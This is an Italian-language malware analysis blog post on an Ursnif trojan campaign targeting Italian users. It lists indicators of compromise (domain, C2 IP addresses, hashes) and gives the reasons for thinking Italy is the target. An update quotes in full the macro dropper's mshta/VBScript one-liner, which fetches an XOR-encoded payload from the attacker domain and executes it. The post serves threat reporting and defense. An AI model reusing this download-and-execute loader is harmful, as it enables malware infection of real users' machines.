Nuova campagna Ursnif rivolta all’Italia

ursnif-imageUna nuova campagna melevola riconducibile al noto trojan Ursnif si sta probabilmente diffondendo in queste ore prendendo come target primari utenze italiane.

 

La primaria risorsa di rete adibita a veicolare il malware risulta attestata sul dominio “pagamento.us“, da cui è stato generato il seguente grafico relazionale:

italy-ursnif-campaign-relE’ importante chiarire che le relazioni qui presentate potrebbero appartenere a società e profili fittizi o del tutto inconsapevoli di quanto accaduto !

Per quanto sin d’ora analizzato del sample malevolo, è possibile visualizzare un grafico del comportamento semplificato del primario modulo di infezione, come generato dal mio ambiente ( attualmente in sviluppo ed ancora in fase beta. non certifico la bontà delle info relazionali sul comportamento riportate di seguito) :

URSNIF Behavior Graph

Il CnC di riferimento appare essere 86.105.1.156

Un estratto delle richieste outgoing che lo riguardano sono evidenziate di seguito:

GET http://86.105.1.156/images/[a-zA-Z0-9]/wHTU.avi

GET http://86.105.1.156/images/[a-zA-Z0-9]/zFQ.avi

IoC:

Domain Names:

pagamento.us [dropping point]

IP:

185.158.251.249

86.105.1.156

37.10.71.202

SHA1:

1c6c476af16ad0431eaae92f4daf1cb63a0a7094

A5ABB3917BBE2343394AA0634F02FD10FB24E8B0

Email:

[email protected]

Cosa spinge a pensare che le utenze italiane siano il target ?

Fondamentalmente tre punti:

1. Il nome a dominio utilizzato come dropping point è in lingua italiana. Inoltre risulta coerente con le motivazioni criminali che solitamente spingono verso la diffusione di tale malware.

2. Il CnC [86.105.1.156] è geo-localizzato in Italia, probabilmente al fine di ottenere più credito da parte delle utenze verso l’infrastruttura ostile.

3. Per la registrazione del nome a dominio è stato utilizzato un nome italiano oltre ad un numero telefonico a cui erano associati diversi profili online che rimandavano a località ed attività commerciali (reali o presunte) italiane.

Aggiornamento [02/08/2018]

Il dropper dell’eseguibile malevolo, come in altri casi simili consegnato via posta elettronica, sembra arrivare da email istituzionali @istruzione.it. Fanno uso di documenti che richiedono l’abilitazione delle macro al fine portare a compimento il ciclo di infezione, mediante le seguenti istruzioni:


cmd.exe /c "mshta vbscript:execute("On Error Resume Next:Set a=CreateObject(""MSXML2.ServerXMLHTTP.6.0""):a.setOption 2,13056:while(Len(b)=0):a.open""GET"",""hxxps://pagamento.us/abcd"",False:a.send:b=a.responseText:wend:k=""MDX01"":for i=0to Len(b)-1Step 2:c=c&Chr(Asc(Chr(""&H""&Mid(b,i+1,2)))xor Asc(Mid(k,((i/2)mod Len(k))+1,1))):Next:ExecuteGlobal c:")(window.close)"

Leave a Reply

Your email address will not be published. Required fields are marked *


9 + 8 =